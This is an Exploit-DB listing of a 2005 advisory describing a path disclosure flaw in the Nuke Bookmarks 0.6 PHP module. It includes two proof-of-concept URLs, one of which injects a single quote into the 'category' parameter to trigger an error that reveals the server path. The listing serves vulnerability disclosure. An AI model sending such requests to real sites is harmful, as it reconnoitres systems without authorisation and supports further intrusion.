Nuke Bookmarks 0.6 Marks.php Path Disclosure Vulnerability

2005-03-26T00:00:00
ID EDB-ID:25282
Type exploitdb
Reporter Gerardo Astharot Di Giacomo
Modified 2005-03-26T00:00:00

Description

Nuke Bookmarks 0.6 Marks.php Path Disclosure Vulnerability. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/12906/info

Nuke Bookmarks is prone to a path disclosure issue when invalid data is submitted.

This issue can allow an attacker to access sensitive data that may be used to launch further attacks against a vulnerable computer. 

http://www.example.com/modules.php?name=Bookmarks&file=marks
http://www.example.com/modules.php?name=Bookmarks&file=marks&category=1\'